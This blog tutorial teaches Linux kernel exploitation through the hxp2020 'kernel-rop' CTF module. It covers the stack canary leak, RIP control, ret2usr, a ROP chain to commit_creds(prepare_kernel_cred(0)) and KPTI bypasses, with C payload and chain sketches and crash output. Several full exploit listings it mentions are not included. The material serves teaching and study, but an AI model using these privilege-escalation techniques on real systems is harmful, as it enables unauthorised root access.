Introduction To Linux Kernel Exploitation: Exploiting Buffer Overflows in Vulnerable Kernel Modules
Prelude
This blog post documents my forays into Linux kernel exploitation.
The basis for this introduction is a challenge from the hxp2020 CTF called kernel-rop.
If you want to follow along, you can either download it from the CTF page or from a local mirror.
There are already a lot of solutions to this challenge on the internet. If you came to my blog looking for such a solution, you may be disappointed. This article is rather about Linux kernel exploitation in general and uses the challenge only as an example. I chose this particular challenge because it seemed to be a good entry point into kernel exploitation.
At the end of this article you will know how common security mitigations in the kernel work and how to circumvent them. We are using qemu as emulator for the kernel and are writing an exploit for a custom kernel module. This setup is pretty common and the bug is easy to spot.
I used drafts of this blog post (and exercises derived from them) to teach a workshop about Linux kernel exploitation at my current company. I want to thank my colleagues for their valuable feedback, which resulted in me rewriting some parts of this blog post, and also in enough pressure to finally finish it.
Setup
First, we unpack the .tar.gz from the CTF and take a look at the relevant files.
vmlinuz
- This contains the actual Linux kernel image.
initramfs.cpio.gz
- This contains the initial ramdisk. This is the filesystem, archived with cpio and compressed with gzip.
run.sh
- This file contains the qemu command to run the VM.
What follows is a more in-depth view of the various files.
vmlinuz
This is the Linux kernel image. We can find out the version using file.
$ file vmlinuz
vmlinuz: Linux kernel x86 boot executable bzImage, version 5.9.0-rc6+ (martin@martin) #10 SMP Sun Nov 22 16:47:32 CET 2020, RO-rootFS, swap_dev 0X7, Normal VGA
The terminology here is that the z at the end indicates that it is compressed. This is usually done with gzip, bzip or lzma. The decompressed image is then called vmlinux.
Decompression can be performed using a script from the Linux kernel that is also locally mirrored here.
initramfs.cpio.gz
This is the initial ramdisk. It is a cpio archive compressed with gzip. gzip is a well-known compression tool. cpio is an archive format like tar. I encountered it back in the days when I was working as a Linux sysadmin. It is a historic format, but is still used here.
We can unpack this using cat initramfs.cpio.gz | gunzip | cpio --extract. We will probably have to do this multiple times, so I use the following script.
#!/bin/bash
# Unpack initramfs.cpio.gz into the directory ./initramfs
mkdir -p initramfs
pushd initramfs
# -i: extract, -d: create directories as needed, -m: keep modification times
gunzip -c ../initramfs.cpio.gz | cpio -idm
popd
The contents of the file system are shown below.
$ tree
.
├── bin
│ ├── busybox
│ └── sh -> busybox
├── etc
│ ├── init.d
│ │ └── rcS
│ ├── inittab
│ ├── motd
│ └── resolv.conf -> /proc/net/pnp
├── hackme.ko
├── init -> bin/busybox
├── root
├── sbin
└── usr
    ├── bin
    └── sbin
This is a Linux file system. motd contains a fun banner. hackme.ko is a kernel module that is vulnerable and needs to be hacked.
The file /etc/init.d/rcS contains the following important parts.
....
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
chmod 400 /proc/kallsyms
insmod /hackme.ko
chmod 666 /dev/hackme
The command echo 1 > /proc/sys/kernel/kptr_restrict obscures the kernel pointers that are exposed via /proc and other interfaces. With this setting, kernel pointers printed with the %pK format specifier are replaced by zeroes unless the reader has the CAP_SYSLOG capability.
The command echo 1 > /proc/sys/kernel/dmesg_restrict prevents unprivileged users from reading the kernel log with dmesg. We could set this to 0 to ease debugging.
The next line, chmod 400 /proc/kallsyms, restricts access to the file /proc/kallsyms. This file contains the kernel symbols, so read access could be used to get valid pointers into the kernel address space.
Next, the vulnerable kernel module is loaded into the kernel using insmod /hackme.ko.
The command chmod 666 /dev/hackme sets the permissions on the device /dev/hackme. This is probably a device that serves as an interface to the vulnerable kernel module hackme.ko. Hence, the goal of the challenge is probably to read from and write to that device and pwn the kernel in this way.
The file /etc/inittab contains the command setuidgid 1000 sh; this gives us a shell for the normal user. We can modify this to setuidgid 0 sh in order to get a root shell. If we boot the modified initramfs, we can then access files that are helpful in debugging the exploit, such as /proc/kallsyms that contains the symbols of the kernel or /sys/module/core/sections/.text that contains the address of the .text section of the kernel.
We will have to compile an exploit, include it in initramfs, compress initramfs and then run the kernel. Then we have to test the exploit and if it does not work, do all the steps again. So here is a script to automate compilation, inclusion in initramfs and compressing initramfs. This script was found here.
#!/bin/bash
# Compile the exploit statically and repack initramfs with it included
in=$1
out=${in%.c}   # strip the ".c" suffix to get the binary name
gcc "$in" -static -o "$out" || exit 255
mv "$out" initramfs/
pushd initramfs
find . -print0 | cpio --null --format=newc -o 2>/dev/null | gzip -9 > ../initramfs.cpio.gz
popd
run.sh
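This script runs the kernel and the initramfs within qemu. Its content, annotated with comments, is as follows. The comments are for explanation only: a backslash followed by a comment no longer continues the line, so the script does not run in this annotated form.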
#!/bin/sh
qemu-system-x86_64 \
-m 128M \ # the memory size
-cpu kvm64,+smep,+smap \ # cpu model and enabling some mitigations
-kernel vmlinuz \ # the kernel image
-initrd initramfs.cpio.gz \ # the initial ramdisk
-hdb flag.txt \ # use this file as harddisk image /dev/hdb
-snapshot \ # write to temporary files and not disk images
-nographic \ # disable graphical output. only command line
-monitor /dev/null \ # redirect the monitor
-no-reboot \ # exit instead of rebooting
-append "console=ttyS0 kaslr kpti=1 quiet panic=1"
# this last line specifies some boot options
As some of these arguments enable kernel security mitigations, these mitigations are the natural next topic. Note that we can modify the mitigations within this command in order to have an easier time exploiting the kernel module.
But first a digression regarding remote debugging. If we append -s to the list of arguments, then qemu enables remote debugging on port 1234. We can connect to this port using the gdb debugger with the command target remote localhost:1234.
If we add -S to the list of arguments of qemu, then the kernel is started in a suspended state. Within gdb, we can attach to this and start the kernel using continue or simply c. This allows debugging the kernel. This information is just for the sake of completeness. We do not make use of remote debugging in the remainder of this article.
Kernel Security Mitigations
As the run.sh script contained options that enable kernel security mechanisms, we will talk about these next.
Kernel ASLR (Address Space Layout Randomization)
- This is similar to ASLR in user space. The kernel is loaded at a random base address in order to prevent an attacker from jumping to functions or gadgets at known addresses.
SMEP (Supervisor Mode Execution Prevention)
- All userland memory pages are treated as non-executable while the CPU is in kernel mode. This prevents using code from user space in kernel exploits. If we want to have arbitrary code execution in the kernel, we need to reuse code that is already inside the kernel (i.e., using a ROP chain with gadgets in the kernel). SMEP is enabled by setting bit 20 of the CR4 control register of the processor.
SMAP (Supervisor Mode Access Prevention)
- Similar to SMEP. It marks all userland memory pages as non-readable and non-writable when execution is in kernel land. While the other mitigations are common to Windows and Linux, SMAP is not implemented in Windows. Like SMEP, SMAP is enabled by a bit in the CR4 control register of the processor, in this case bit 21.
KPTI (Kernel Page Table Isolation)
- This is a further enhancement of SMEP/SMAP. Userland and kernel land page tables are isolated. One set of page tables is used for running in kernel mode. This contains both user mode and kernel mode pages. A second set of page tables is used when running in user mode. It contains the full userland pages and only the minimal set of kernel mode pages that is needed.
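To make the two CR4 bits concrete, here is a small sketch that decodes them from a CR4 value such as the one the kernel prints in a crash dump (the dump later in this post shows CR4: 00000000003006f0). The helper names cr4_has_smep and cr4_has_smap are made up for this illustration and are not part of any kernel API.

```c
#include <stdbool.h>
#include <stdint.h>

/* Bit positions (counted from 0) of the two flags in CR4. */
#define CR4_SMEP_BIT 20
#define CR4_SMAP_BIT 21

/* Hypothetical helper: true if the SMEP flag is set in this CR4 value. */
bool cr4_has_smep(uint64_t cr4) {
    return (cr4 >> CR4_SMEP_BIT) & 1;
}

/* Hypothetical helper: true if the SMAP flag is set in this CR4 value. */
bool cr4_has_smap(uint64_t cr4) {
    return (cr4 >> CR4_SMAP_BIT) & 1;
}
```

For the value 0x3006f0 both helpers return true, which matches the +smep,+smap options passed to qemu in run.sh.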
Reconnaissance
After we have our setup, a natural next step is looking at the vulnerability that we are going to exploit. We already know that it resides within the hackme.ko kernel module. Hence, let us take a look at its properties.
$ rabin2 -I hackme.ko
arch x86
baddr 0x8000000
binsz 317877
bintype elf
bits 64
canary true
injprot false
class ELF64
compiler GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
crypto false
endian little
havecode true
laddr 0x0
lang c
linenum true
lsyms true
machine AMD x86-64 architecture
nx false
os linux
pic false
relocs true
relro no
rpath NONE
sanitize false
static true
stripped false
subsys linux
va true
We can see that stack canaries are enabled in the kernel module. This is a mitigation against exploitation of buffer overflows. A random value (the canary) is placed on the stack, and before a function returns, the canary is checked for modifications. A modified canary is treated as an exploit attempt, and the kernel panics instead of returning.
Disassembling the kernel module, e.g., using Ghidra or r2 reveals multiple functions.
$ r2 -A initramfs/hackme.ko
...
-- Remember to maintain your ~/.radare_history
[0x08000064]> afl
0x08000070 1 13 sym.hackme_release
0x08000080 8 174 sym.hackme_write
0x08000140 1 13 sym.hackme_open
0x08000150 5 174 sym.hackme_read
0x08000207 1 23 sym.hackme_init
0x0800021e 1 18 sym.hackme_exit
The functions hackme_init, hackme_exit, hackme_open, and hackme_release are necessary for a kernel module that provides a device. hackme_init and hackme_exit run when the module is loaded and unloaded, and hackme_open and hackme_release run when the device file is opened and closed.
The function hackme_read is executed when we read from /dev/hackme.
The function hackme_write is executed when we write to /dev/hackme.
Decompiling hackme_read, again using Ghidra or r2, reveals the following.
There is a 32-element array tmp[32] on the stack, but we can read up to 0x1000 = 4096 bytes. Assuming 4-byte elements, the array occupies 128 bytes, which matches the canary showing up at 8-byte offset 16 in the leak further down. Thus, it allows us to read past the array and hence leak the stack.
The function hackme_write is very similar. It allows us to write up to 0x1000 bytes into the same kind of array on the stack. Hence, it allows us to overflow the stack.
Leaking the Stack
As we can leak the stack using hackme_read, we can also read the stack canary. Our code is based on this awesome writeup.
We prepare a file called leak_stack.c. This can be compiled and packed into the initramfs using the script shown above in the setup section.
Then, we can execute run.sh to start the kernel and drop into a shell within the qemu environment. If we included the compiled leak_stack.c correctly, we should find it in the root folder. Its output looks as follows.
$ ./leak_stack
[+] successfully opened /dev/hackme
[*] trying to leak up to 320 bytes memory
[+] offset 0 contains value: 0xffffffffa773a630
[+] offset 1 contains value: 0x2a
[+] offset 2 contains value: 0x3d8f236e8e010100
[+] offset 3 contains value: 0xffff946086cae110
[+] offset 4 contains value: 0xffffad8e801bfe68
[+] offset 5 contains value: 0x4
[+] offset 6 contains value: 0xffff946086cae100
[+] offset 7 contains value: 0xffffad8e801bfef0
[+] offset 8 contains value: 0xffff946086cae100
[+] offset 9 contains value: 0xffffad8e801bfe80
[+] offset 10 contains value: 0xffffffffa728ab57
[+] offset 11 contains value: 0xffffffffa728ab57
[+] offset 12 contains value: 0xffff946086cae100
[+] offset 13 contains value: 0x0
[+] offset 14 contains value: 0x7ffe54601790
[+] offset 15 contains value: 0xffffad8e801bfea0
[+] offset 16 contains value: 0x3d8f236e8e010100
[+] offset 17 contains value: 0x140
[+] offset 18 contains value: 0x0
[+] offset 19 contains value: 0xffffad8e801bfed8
[+] offset 20 contains value: 0xffffffffa728565f
[+] offset 21 contains value: 0xffff946086cae100
[+] offset 22 contains value: 0xffff946086cae100
[+] offset 23 contains value: 0x7ffe54601790
[+] offset 24 contains value: 0x140
[+] offset 25 contains value: 0x0
[+] offset 26 contains value: 0xffffad8e801bff20
[+] offset 27 contains value: 0xffffffffa75a6507
[+] offset 28 contains value: 0xffffffffa7871d81
[+] offset 29 contains value: 0x0
[+] offset 30 contains value: 0x3d8f236e8e010100
[+] offset 31 contains value: 0xffffad8e801bff58
[+] offset 32 contains value: 0x0
[+] offset 33 contains value: 0x0
[+] offset 34 contains value: 0x0
[+] offset 35 contains value: 0xffffad8e801bff30
[+] offset 36 contains value: 0xffffffffa776330a
[+] offset 37 contains value: 0xffffad8e801bff48
[+] offset 38 contains value: 0xffffffffa6e0a157
When looking at the stack, we can see three types of entities. There are small scalar values, such as function arguments, at offsets 1 and 5. Then, there are addresses starting with 0xffff. Thirdly, there are stack canaries, such as the ones at offsets 2, 16, and 30. Apparently, the one at offset 2 is part of the uninitialized memory of the variable tmp[32] and not the canary of the current function, even though it looks like one.
One tutorial computes the offset of the stack canary simply through reverse engineering.
Another tutorial detects the stack canary automatically by assuming that it does not start with ffff and ends in 00.
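The automatic detection can be sketched in a few lines of C. This is only an illustration of the heuristic, not the code from either tutorial: the function names are made up, and the extra "non-zero" condition is my own addition so that empty stack slots are not reported.

```c
#include <stddef.h>
#include <stdint.h>

/* Heuristic from the text: a candidate does not start with ffff (so it is
 * not a kernel pointer) and ends in 00. Zero values are skipped as well,
 * which is an extra assumption of this sketch. */
int looks_like_canary(uint64_t v) {
    return v != 0 && (v & 0xff) == 0 && (v >> 48) != 0xffff;
}

/* Stores the indices of all candidates in out (at most max_out of them)
 * and returns the total number of candidates found in leak[0..n-1]. */
size_t find_canary_candidates(const uint64_t *leak, size_t n,
                              size_t *out, size_t max_out) {
    size_t found = 0;
    for (size_t i = 0; i < n; i++) {
        if (looks_like_canary(leak[i])) {
            if (found < max_out)
                out[found] = i;
            found++;
        }
    }
    return found;
}
```

Applied to the leak above, this reports offsets 2, 16, and 30. The heuristic alone therefore cannot tell the stale value at offset 2 from the real canary at offset 16, so a look at the disassembly is still needed to pick the right one.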
Controlling RIP
As a next step, we want to check if we can control the instruction pointer RIP.
As mentioned above, we can overwrite the stack using the function hackme_write. When this function is done, the stack is unwound. This means that the previous stack context has to be recovered. RBX, RBP, and R12 are callee-saved registers in the x86-64 calling convention. The function uses them, so it has to restore them from the stack before it returns. Finally, the instruction pointer RIP is popped.
So we can construct a payload and write it to /dev/hackme.
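A minimal sketch of such a payload is shown here. The canary slot (offset 16) comes from the leak. The order of the saved registers after the canary (RBX, R12, RBP, then the return address) is an assumption that I infer from the marker values in the crash dump below, and the function name is made up for this example.

```c
#include <stddef.h>
#include <stdint.h>

#define CANARY_OFFSET 16 /* 8-byte slot of the canary, taken from the leak */
#define PAYLOAD_WORDS 21

/* Fills payload[0..20] and returns the payload size in bytes.
 * Assumed epilogue order after the canary: rbx, r12, rbp, return address. */
size_t build_rip_control_payload(uint64_t payload[PAYLOAD_WORDS],
                                 uint64_t cookie) {
    size_t off = 0;
    while (off < CANARY_OFFSET)
        payload[off++] = 0;                  /* filler for tmp[] */
    payload[off++] = cookie;                 /* keep the canary intact */
    payload[off++] = 0x4444444444444444ULL;  /* marker for rbx */
    payload[off++] = 0x4343434343434343ULL;  /* marker for r12 */
    payload[off++] = 0x4242424242424242ULL;  /* marker for rbp */
    payload[off++] = 0x4141414141414141ULL;  /* marker for the return address */
    return off * sizeof(uint64_t);
}
```

The resulting buffer would then be passed to write() on the file descriptor of /dev/hackme, using the returned size as the length.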
Again, we need to compile, compress the exploit into initramfs and start it with qemu using run.sh.
$ ./control_rip
[+] successfully opened /dev/hackme
[*] trying to leak up to 320 bytes memory
[+] leaked cookie 0xa19c496548ccde00 at offset 16
[ 4.268641] general protection fault: 0000 [#1] SMP PTI
[ 4.269235] CPU: 0 PID: 113 Comm: control_rip Tainted: G O 5.9.0-rc6+ #10
[ 4.269605] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-1.fc39 04/01/2014
[ 4.270271] RIP: 0010:0x4141414141414141
[ 4.270653] Code: Bad RIP value.
[ 4.271015] RSP: 0018:ffffa2d5c01bfeb0 EFLAGS: 00000296
[ 4.271432] RAX: 0000000000000140 RBX: 4444444444444444 RCX: 0000000000000000
[ 4.271753] RDX: 00000000ffffffff RSI: ffffffffc00dc580 RDI: ffffa2d5c01bff48
[ 4.272099] RBP: 4242424242424242 R08: ffffffff9c46af7a R09: ffffa2d5c01bff48
[ 4.272388] R10: ffffffff9bc0a157 R11: 0000000000000000 R12: 4343434343434343
[ 4.272926] R13: ffffa2d5c01bfef0 R14: 00007ffd3d05bd10 R15: ffff8c27c6caef00
[ 4.273360] FS: 000000000226f380(0000) GS:ffff8c27c7a00000(0000) knlGS:0000000000000000
[ 4.273834] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 4.274157] CR2: 4141414141414141 CR3: 000000000652c000 CR4: 00000000003006f0
[ 4.274665] Call Trace:
[ 4.275780] ? ksys_read+0xa7/0xe0
[ 4.275933] ? exit_to_user_mode_prepare+0x31/0x180
[ 4.276170] ? __x64_sys_read+0x1a/0x20
[ 4.276376] ? do_syscall_64+0x37/0x80
[ 4.276564] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 4.276865] Modules linked in: hackme(O)
[ 4.277795] ---[ end trace 348a615b394120d4 ]---
[ 4.278031] RIP: 0010:0x4141414141414141
[ 4.278271] Code: Bad RIP value.
[ 4.278463] RSP: 0018:ffffa2d5c01bfeb0 EFLAGS: 00000296
[ 4.278747] RAX: 0000000000000140 RBX: 4444444444444444 RCX: 0000000000000000
[ 4.278999] RDX: 00000000ffffffff RSI: ffffffffc00dc580 RDI: ffffa2d5c01bff48
[ 4.279286] RBP: 4242424242424242 R08: ffffffff9c46af7a R09: ffffa2d5c01bff48
[ 4.279604] R10: ffffffff9bc0a157 R11: 0000000000000000 R12: 4343434343434343
[ 4.279952] R13: ffffa2d5c01bfef0 R14: 00007ffd3d05bd10 R15: ffff8c27c6caef00
[ 4.280318] FS: 000000000226f380(0000) GS:ffff8c27c7a00000(0000) knlGS:0000000000000000
[ 4.280804] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 4.281200] CR2: 4141414141414141 CR3: 000000000652c000 CR4: 00000000003006f0
Segmentation fault
...
We can clearly see that we control the return address RIP, as it contains 0x4141414141414141. This is so far with all mitigations still enabled.
However, as we are in kernel mode, it is not immediately clear how to exploit this fact.
Privilege Escalation Without Any Mitigations: Ret2Usr
In order to make our life easier, let us first disable the security mechanisms and try to exploit it. We can later add the security mechanisms again and build up to the full challenge.
Within run.sh, instead of the last line -append "console=ttyS0 kaslr kpti=1 quiet panic=1", we write -append "console=ttyS0 nosmep nosmap nopti nokaslr quiet panic=1" in order to disable SMEP/SMAP, as well as KASLR and KPTI.
Now, we only have the stack canary to take care of. This is similar to userland exploitation with ROP chains. In userland, the goal is usually to spawn an elevated shell. In the kernel, it is the same.
There are two functions in the kernel that are usually used for elevating privileges.
prepare_kernel_cred()
- This kernel function prepares a set of credentials for a kernel service and can also override the credentials of a task for delegation purposes. If we call this with 0 as argument, the returned credentials have no group and full capabilities.
commit_creds()
- This kernel function installs new credentials in the current thread.
Hence, the goal is to call commit_creds(prepare_kernel_cred(0)) using a ROP chain.
We can find the addresses of these functions inside the kernel by checking /proc/kallsyms. For this we modify /etc/inittab in the initramfs to contain setuidgid 0 sh. This will drop us to a root shell, so we are allowed to read /proc/kallsyms. Don’t forget to undo these changes, or you will wonder later why your privilege escalation always works without doing anything.
# id
uid=0 gid=0 groups=0
# cat /proc/kallsyms | grep -e prepare_kernel_cred -e commit_creds
ffffffff814c6410 T commit_creds
ffffffff814c67f0 T prepare_kernel_cred
So we have the addresses that we need to put on the ROP chain.
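If you prefer to collect such addresses programmatically during development instead of using grep, a line of /proc/kallsyms can be parsed as in the following sketch. The function name kallsyms_match is hypothetical. It assumes the usual "address type name" layout of a kallsyms line, as seen in the output above.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Parses one kallsyms line of the form "<hex address> <type> <name>".
 * Returns 1 and stores the address in *addr if the symbol name equals
 * wanted, otherwise returns 0 and leaves *addr untouched. */
int kallsyms_match(const char *line, const char *wanted, uint64_t *addr) {
    uint64_t value;
    char type;
    char name[128];

    if (sscanf(line, "%" SCNx64 " %c %127s", &value, &type, name) != 3)
        return 0;
    if (strcmp(name, wanted) != 0)
        return 0;
    *addr = value;
    return 1;
}
```

Reading /proc/kallsyms line by line with fgets() and feeding each line to this helper yields the same two addresses, as long as the reader is root in the debugging setup.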
After elevating our privileges, we need to go back to userland. For this we need the assembly instruction swapgs with either iretq or sysretq.
swapgs
- GS is one of the segment registers, such as CS (Code Segment), DS (Data Segment), or SS (Stack Segment). These registers point to the respective sections in the binary. The CS register points to the code segment in the binary, i.e., .text. The DS register points to the data segment .data in the binary and so on. When a context switch from user mode to kernel mode or back takes place, these registers just need to point to different memory addresses in order to facilitate this change. FS and GS are special registers in the CPU that can also be used for this context switch but whose purpose is not specified by the CPU manufacturer and thus can be chosen by the programmers of the operating system. FS and GS are used by Linux and Windows to access thread-specific storage. As an example, in Windows, the Thread Environment Block (TEB) can be found at a fixed offset from GS or FS, depending on whether the architecture is 32 or 64 bit. To make a long story short, we must swap the GS register when entering user mode from kernel mode or vice versa.
iretq/sysretq
- Either of these instructions needs to be used to perform the actual context switch between kernel and user mode. iretq is easier to use, as it only requires the stack to be set up with five values for userland in the order RIP, CS, RFLAGS, RSP, SS. For sysretq we need to move the return address that should end up in RIP into RCX. Further, sysretq restores RFLAGS from R11. Bits 48 to 63 of the return address need to be the same as bit 47, i.e., the address must be canonical. Otherwise, we get a general protection fault.
Executing these two instructions can be performed in our exploit code using inline assembly. We do not even need a ROP chain for that, as we have disabled SMEP/SMAP and thus the kernel can jump straight to code that lives in our userland binary.
Note that when we return to user mode with iretq/sysretq, we need to set the registers. Hence, before doing this dance, we have to store the userland registers in order to be able to restore them later. This can be done as follows.
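A minimal sketch of such a state-saving routine, assuming GCC or Clang on x86-64, could look like this. The variable names user_cs, user_ss, user_sp, and user_rflags are my own choice, and the return value is only there so that the code still compiles on other architectures.

```c
#include <stdint.h>

/* Userland register values that iretq will need later. */
uint64_t user_cs, user_ss, user_sp, user_rflags;

/* Saves CS, SS, RSP and RFLAGS of the calling userland process.
 * Returns 1 if the state was saved, 0 when not built for x86-64. */
int save_state(void) {
#if defined(__x86_64__)
    __asm__ volatile(
        "mov %%cs, %0\n\t"
        "mov %%ss, %1\n\t"
        "mov %%rsp, %2\n\t"
        "lea -128(%%rsp), %%rsp\n\t" /* step over the red zone before pushing */
        "pushfq\n\t"                 /* RFLAGS can only be read via the stack */
        "pop %3\n\t"
        "lea 128(%%rsp), %%rsp\n\t"  /* lea does not modify the flags */
        : "=r"(user_cs), "=r"(user_ss), "=r"(user_sp), "=r"(user_rflags)
        :
        : "memory");
    return 1;
#else
    return 0;
#endif
}
```

save_state() has to be called in userland before the overflow is triggered. The saved values, together with the address of a userland function that spawns the shell, later form the five-value frame that iretq expects.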
Now we can put everything together. The following code is the full exploit for a kernel without any mitigations except stack canaries.
Executing this code looks as follows.
$ ./no_mitigations
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
[+] leaked cookie 0x2aa741ea8a7daa00 at offset 16
[+] we are root (uid = 0)
/ # id
uid=0 gid=0
As we see the message [+] we are root (uid = 0) in the output of our exploit, the elevation of privileges worked.
Note that in the payload we could, instead of execl("/bin/sh", "sh", NULL);, also write system("/bin/sh");. This solution can be found in different writeups, but in my tests it did not work and led to a segmentation fault. I have no idea why this does not work. If you read this and know why it happens, please let me know. I will edit this section when I find out.
Adding SMEP/SMAP
Next, we will add the mitigations SMEP/SMAP and again try to exploit the kernel module. Remember that SMEP/SMAP stands for Supervisor Mode Execution/Access Prevention and marks memory pages from userland as non-executable/non-accessible, as long as we are in kernel mode. Hence, our exploit will not work anymore, as the inline assembly we wrote lives in user space, but we execute it from kernel mode. SMEP marks these pages as non-executable.
To enable SMEP/SMAP, we modify the last line of the original run.sh as follows: -append "console=ttyS0 nopti nokaslr quiet panic=1".
Running the previous exploit yields an error message.
$ ./no_mitigations
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
[+] leaked cookie 0xaeab3cc4e3107a00 at offset 16
[ 4.726632] unable to execute userspace code (SMEP?) (uid: 1000)
[ 4.727729] BUG: unable to handle page fault for address: 00000000004019bf
[ 4.728668] #PF: supervisor instruction fetch in kernel mode
[ 4.729483] #PF: error_code(0x0011) - permissions violation
[ 4.730694] PGD 6119067 P4D 6119067 PUD 6118067 PMD 6163067 PTE 7919025
[ 4.732670] Oops: 0011 [#1] SMP NOPTI
[ 4.733963] CPU: 0 PID: 113 Comm: no_mitigations Tainted: G O 5.9.0-rc6+ #10
[ 4.734799] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-1.fc39 04/01/2014
[ 4.736732] RIP: 0010:0x4019bf
[ 4.737208] Code: Bad RIP value.
...
The important part is [4.726632] unable to execute userspace code (SMEP?) (uid: 1000).
Well, we are doing kernel exploitation. The error messages are not getting any clearer than this.
In previous kernel versions up to around 2019 it was possible to disable SMEP/SMAP by using the kernel function native_write_cr4(). As SMEP and SMAP are activated by setting bits 20 and 21 in the CR4 control register of the processor, it was possible to set those bits to zero and hence disable SMEP/SMAP. However, this was patched by pinning the bits so they cannot be changed anymore. Hence, this game plan does not work anymore.
Instead, we will craft a ROP chain using gadgets from the kernel only. This ROP chain will perform commit_creds(prepare_kernel_cred(0)), swapgs, and iretq.
First we create a list of all gadgets inside the kernel. Extract vmlinuz to vmlinux, as explained in the setup instructions above.
There are multiple tools that can be used to extract ROP gadgets from vmlinux.
ROPGadget (pip install ROPGadget) can be used with the command ROPgadget --binary vmlinux > gadgets.txt to find the gadgets. However, it does not seem to find gadgets containing iretq.
There is also ropr (cargo install ropr) that is invoked using ropr --nouniq vmlinux > gadgets.txt
We can also filter gadgets using, e.g., ropr --nouniq -R '^iretq' vmlinux
Note that some of the gadgets that are found do not work, as they are in memory that is marked as non-executable.
All that is left is creating a fake stack with the functions that we want to have executed. We then write to the device /dev/hackme and overwrite the real stack with our fake stack. When the stack is unwound, our functions are executed.
Note that in the x64 calling convention, the arguments to functions are given in registers. The register RDI contains the first argument of a function. Hence, we write the value 0 into RDI and then call prepare_kernel_cred. The result is then returned in the register RAX, again according to the x64 calling convention.
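The layout of such a fake stack can be sketched as follows. All gadget addresses are parameters here, because the concrete values have to come from your own gadget search. The struct and function names are made up, and the sketch assumes clean gadgets of the form pop rdi; ret and mov rdi, rax; ret. Real kernels often only offer variants with extra pops or jumps, which need additional filler values on the chain.

```c
#include <stddef.h>
#include <stdint.h>

/* Addresses found with a gadget finder and in /proc/kallsyms (placeholders). */
struct kernel_gadgets {
    uint64_t pop_rdi_ret;          /* pop rdi ; ret */
    uint64_t mov_rdi_rax_ret;      /* mov rdi, rax ; ret (assumed to exist) */
    uint64_t swapgs_ret;           /* swapgs ; ret */
    uint64_t iretq;                /* iretq */
    uint64_t prepare_kernel_cred;
    uint64_t commit_creds;
};

/* The five values iretq pops, in this order. */
struct user_frame {
    uint64_t rip, cs, rflags, rsp, ss;
};

/* Writes the chain into chain[] starting at index off (the slot of the
 * saved return address) and returns the index after the last entry. */
size_t build_rop_chain(uint64_t *chain, size_t off,
                       const struct kernel_gadgets *g,
                       const struct user_frame *u) {
    chain[off++] = g->pop_rdi_ret;
    chain[off++] = 0;                      /* rdi = 0 */
    chain[off++] = g->prepare_kernel_cred; /* rax = prepare_kernel_cred(0) */
    chain[off++] = g->mov_rdi_rax_ret;     /* rdi = rax */
    chain[off++] = g->commit_creds;        /* commit_creds(rdi) */
    chain[off++] = g->swapgs_ret;
    chain[off++] = g->iretq;
    chain[off++] = u->rip;
    chain[off++] = u->cs;
    chain[off++] = u->rflags;
    chain[off++] = u->rsp;
    chain[off++] = u->ss;
    return off;
}
```

The chain replaces the single marker value that was used to demonstrate control over RIP, while the canary and the saved registers in front of it stay as before.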
Alternative way of bypassing SMEP but not SMAP
You may have noticed that we bypassed both SMEP and SMAP. By building the ROP chain only from kernel gadgets, we needed neither to execute nor to access memory pages from user mode. But there are alternative approaches that can bypass SMEP, but not SMAP, one of which I want to touch on here. The idea is to pivot the stack to a location where we can write our ROP chain. This is useful in the case where we can overwrite only the return address but nothing beyond it.
There are a bunch of ROP gadgets that move a constant value into ESP. One such gadget is as follows.
One could use this gadget as the return address when overflowing the buffer of the vulnerable device. Beforehand, one needs to write the remainder of the ROP chain to the address that is moved to ESP. This can be achieved by allocating the region using mmap.
The idea works if SMEP is enabled, as we do not need to execute anything in userland. However, it does not work when SMAP is enabled, as we need read and write access to the location where we pivot to, i.e., to a user land memory page.
I saw this idea in this other writeup.
We need to modify run.sh to disable SMAP and enable SMEP using the command line arguments -cpu kvm64,+smep.
The full code for the exploit is shown below.
Adding KPTI
Next, we will add Kernel page-table isolation (KPTI). For this we edit run.sh to include -append "console=ttyS0 kpti=1 nokaslr quiet panic=1".
KPTI is a mechanism to isolate kernel page tables from user space. In user space, only those kernel pages are mapped that are necessary to switch to kernel mode.
Thus, if we execute the previous exploit, we get a segmentation fault instead of a kernel panic. This happens because we return to user mode while the kernel page tables are still active, and in those the userland pages cannot be executed.
The following ASCII art illustrates the results of KPTI.
   Without KPTI                               With KPTI
+----------------+            +----------------+ +----------------+
|                |            |                | |                |
|  Kernel pages  |            |  Kernel pages  | |                |
|                |            |                | +----------------+
|                |            |                | |  Kernel pages  |
+----------------+            +----------------+ +----------------+
|                |            |                | |                |
|                |            |                | |                |
|                | ---------> |                | |                |
|                |            |                | |                |
|   User pages   |            |   User pages   | |   User pages   |
|                |            |                | |                |
|                |            |                | |                |
|                |            |                | |                |
|                |            |                | |                |
|                |            |                | |                |
|                |            |                | |                |
+----------------+            +----------------+ +----------------+
  User + Kernel                  Kernel mode         User mode
      mode
I have read about three ways to bypass KPTI:
- Using a signal handler: Here, a signal handler for the segmentation fault is registered that will execute the payload with root privileges.
- KPTI Trampolines: The kernel needs to contain a functionality for changing from kernel mode to user mode. This function, called a KPTI trampoline, is still mapped in memory even when we are in user mode and hence can be used to return to user space without our hacky swapgs and iretq gadgets.
- Abusing modprobe: The kernel has a reference to the path of the binary modprobe. Under some circumstances, the binary at this path is executed. If the path is overwritten, and the circumstances are achieved, then the file at the new path is executed. This execution happens with kernel privileges.
KPTI Bypass 1: Using a Signal Handler
This is probably the easiest way to circumvent KPTI.
Remember that if we execute the previous exploit, we get a segmentation fault. We can register a signal handler that handles the segmentation fault and executes the payload.
The segmentation fault occurs after the elevation of privileges, when the switch back to user mode with iretq is performed. Hence, we only need to prevent the process from crashing. Instead of executing the payload, the registered function to handle the segmentation fault could simply do nothing.
Adding a signal handler can be performed by including the line signal(SIGSEGV, payload); within the main function. Further, we need to include the respective headers using #include <signal.h>.
